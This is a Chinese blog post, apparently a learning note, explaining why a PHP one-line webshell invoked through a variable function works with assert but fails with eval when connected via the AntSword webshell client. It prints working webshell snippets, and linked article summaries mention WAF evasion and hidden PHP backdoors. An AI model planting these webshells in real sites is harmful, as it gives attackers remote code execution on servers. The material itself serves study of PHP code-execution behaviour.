assert和eval成功失败原因

最新推荐文章于 2024-07-03 09:47:45 发布
最新推荐文章于 2024-07-03 09:47:45 发布
阅读量334 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61579490/article/details/125984332
版权

可以看到这样的一句话木马

<?php
$_POST['1']($_POST['2']);
eval() 可变函数
phpinfo()
strpos()
assert()

把POST中的1传成:eval

<?php
@eval($_POST['2']);
?>

虽然可以实现,很容易被发现,但是:这样的方式连接失败

 

 

因为eval是一个语言构造器而不是一个函数,不能被 可变函数 调用。

PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。可变函数可以用来实现包括回调函数,函数表在内的一些用途。

可变函数不能用于例如 echo,print,unset(),isset(),empty(),include,require 以及类似的语言结构。需要使用自己的包装函数来将这些结构用作可变函数。

这么看来eval其实并不能算是‘函数’,而是PHP自身的语言结构,如果需要用‘可变’的方式调用,需要自己构造,类似这样子的:

<?php
function eval_1($str)
{
   eval($str);
}
 
$a='eval_1';
$a('phpinfo()');
?>

而我们使用assert则可以成功,因为assert在php中被认为是一个函数,这样提交参数相当于将PHP中代码变成了

<?php
assert(eval($_POST['2']));
?>

 

终于连接成功,说明这个方法是可行的 ,成功原因:assert在php中被认为是一个函数

这里再次强调一点,请牢记

eval函数中参数是字符,如:
eval('echo 1;');
assert函数中参数为表达式 (或者为函数),如:
assert(phpinfo()) 

CUILL.
关注
assert利用蚁剑登录
ikta的博客
07-29 2825
在本地站点下创建test.php页面,编写一句话木马,用火狐浏览器的HackBar来执行第一步第二步第三步输出结果这就是通过post提交值传进来后打印出来假如我们提交的是这个结果再次提交,输入2=phpinfo();显示页面这就是通过火狐演示一句话木马上线方式接下来聊一聊。...............
php assert eval,代码执行函数之一句话木马
weixin_28864249的博客
03-23 2074
前言大家好,我是阿里斯,一名IT行业小白。非常抱歉,昨天的内容出现瑕疵比较多,今天重新整理后再次发出,修改并添加了细节,另增加了常见的命令执行函数如果哪里不足,还请各位表哥指出。evalassert的区别eval特点eval()会把字符串按照php代码来执行(合法的php代码,以分号结尾)eval()是一个语言构造器,不能被可变函数调用eval($_REQUEST[1]); #eval一句话...
PHP变量函数(可变函数)
sinat_34463728的博客
04-09 483
PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。可变函数可以用来实现包括回调函数,函数表在内的一些用途。可变函数不能用于例如 echo,print,unset(),isset(),empty(),include,require 以及类似的语言结构。需要使用自己的包装函数来将这些结构用作可变函数。 function fo
php eval $ post,网站多了几个PHP文件,eval($_POST['1']);
weixin_39805883的博客
03-11 813
网站多了几个PHP,内容如下:eval($_POST['1']);有的是其他内容, 我百度了一下发现时执行某些命令的,我测试了一下 如果权限没限制好的话 确实可以执行一些命令。 请问 除了设置权限,从代码级别可否做限制呢?有没有什么好办法呢?还有个PHP文件内容如下:还有文件,名字是:13686921256303.virus_killed内容是:请各位出出注意,谢谢了。回复内容:网站多了几个PHP...
蚁剑
m0_64338211的博客
01-16 1324
1.编写一句话木马,并命名为post.php 2.利用"蚁剑"连接靶机上的post.php (1)打开中国蚁剑 (2)在“中国蚁剑"主界面空白处单击鼠标右键,在弹出的菜单中选择"添加数据" 添加一条Webshell管理项 3、利用“中国蚁剑"对靶机进行虚拟终端及文件操作 (1)虚拟终端操作 打开虚拟终端界面后,可以像操作本地机器一样,对靶机执行一些操作系统命令 (2)文件操作、数据操作 ...
蚁剑特征性信息修改简单过WAF
Adminxe的博客
09-21 936
0x00 前言 针对于蚁剑的特征,对于流量传输中WAF检测的绕过, 打造武器库, 进行合理化的修改,例如请求头的伪造,流量的加密等一些常用功能,这边主要进行 这几部分的修改。 0x01 修改位置 蚁剑代理通道 UA特征伪造 RSA流量加密 0x02 具体操作 1.蚁剑代理通道 蚁剑代理通道设置(前提是必须有这个代理): 2.UA特征伪造 蚁剑默认UA抓包: 主要修改的位置: /modules/request.js 这边主要是推荐百度UA,具体自己可以百度下其他UA,都可..
php5和php7中evalassert
L1ni01
12-04 2210
eval php官方手册: (PHP 4, PHP 5, PHP 7) eval — 把字符串作为PHP代码执行 该函数只有一个参数,即需要被执行的字符串代码。 代码不能包含打开/关闭PHP标签,但可以用合适的 PHP tag 来离开、重新进入 PHP 模式。 我们下面进行测试 <?php eval(' echo "Hi!"; '); echo "\n"; //eval('echo `whoami`;'); eval('<?php echo "Hi!";?>'); echo "\n"; e
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_42181929的博客
03-18 1798
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
Python.基础整理
newlife1441的博客
07-23 1026
Python由荷兰数学和计算机科学研究学会的吉多·范罗苏姆于1990年代初设计,作为一门叫做ABC语言的替代品。Python提供了高效的高级数据结构,还能简单有效地面向对象编程。Python还为我们提供了非常完善的基础代码库,覆盖了网络、文件、GUI、数据库、文本等大量内容,被形象地称作“内置电池(batteriesincluded)”。用Python开发,许多功能不必从零编写,直接使用现成的即可。当然除了这些优点外,........................
负荷计算的时候assert失败_电气负荷计算的9个入门基础知识,新手入门必备!...
weixin_39518678的博客
12-14 94
负荷计算是电气设计人员必须掌握的一必修课,选导体、设备还有保护开关的选择,电网系统分析,都离不开负荷计算的内容,为此特意总结9个负荷计算的入门基础知识,分享给大家,希望能在工作和学习中作为一份参考。(1)什么是负荷计算?计算负荷是将实际负荷转换成一种假想的持续负荷的计算方法。实际负荷中有不间断工作的,也有随机变化的,利用负荷计算将它们进行归一化的处理。(2)负荷计算的目的是什么?负荷计算...
负荷计算的时候assert失败_断言(Assert)与异常(Exception)
weixin_42245736的博客
01-14 662
断言是被用来检查非法情况而不是错误情况,即在该程序正常工作时绝不应该发生的非法情况,用来帮助开发人员对问题的快速定位。异常处理用于对程序发生异常情况的处理,增强程序的健壮性、容错性,减少程序使用中对用户不有好的行为,不让(通常也不必)用户知道发生了什么错误。实际开发中,我们通常将Assert与异常混淆,不知道什么时候使用Assert,什么时候使用异常处理。或者不用Assert,将一切情况都归为异...
用CFile 快速反复打开已unicode编码的文件名的文件,会出现assert失败
徐新华的专栏
03-31 636
<br />改用标准C接口,fopen,注意对大文件和unicode的支持<br /> 
木马蚁剑使用
最新发布
zhuge_long的专栏
07-03 479
数据库对文件的权限确认。
python基础知识点与asserteval的成功与失败
senng的博客
07-25 547
python基础知识点与asserteval的成功与失败
evalassert执行一句话木马
C_LCH_2000的博客
07-24 2397
eval函数中参数是字符,assert函数中参数为表达式 (或者为函数)
C语言assert()调用之后编译,出现错误后的解决办法
SuperWML的博客
10-17 624
关于这个错误,我这里的解决方法是把UTF-8编码,转换成GBK编码,然后重新编译即可。
python中input的意思_python input是什么意思
weixin_39775127的博客
11-29 610
Python是一种解释型、面向对象、动态数据类型的高级程序设计语言。Python由Guido van Rossum于1989年底发明,第一个公开发行版发行于1991年。像Perl语言一样, Python 源代码同样遵循 GPL(GNU General Public License)协议。python input是什么意思?Python3.x 中 input() 函数接受一个标准输入数据,返回为 s...
ubuntu php 无法执行exec_聊一聊代码、命令执行
weixin_39710179的博客
11-21 222
谁让我写不出鲨鱼大佬那种内网的文章,只好写写这种基础文章来划划水喽....代码执行代码执行概念远程代码执行实际上是调用服务器网站代码进行执行。常见执行方法evaleval():将字符串当做函数进行执行(需要传入一个完整的语句)demo:...
复现asserteval成功连接或失败连接蚁剑的原因
m0_49137360的博客
07-23 5813
一句话木马
assert和NDEBUG
08-08
assert和NDEBUG都是与调试相关的预处理指令。 assert是一个宏,用于在程序运行时检查一个条件是否为真。如果条件为假,assert会导致程序立即终止,并输出一条错误信息。assert的使用可以帮助程序员在开发阶段快速...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值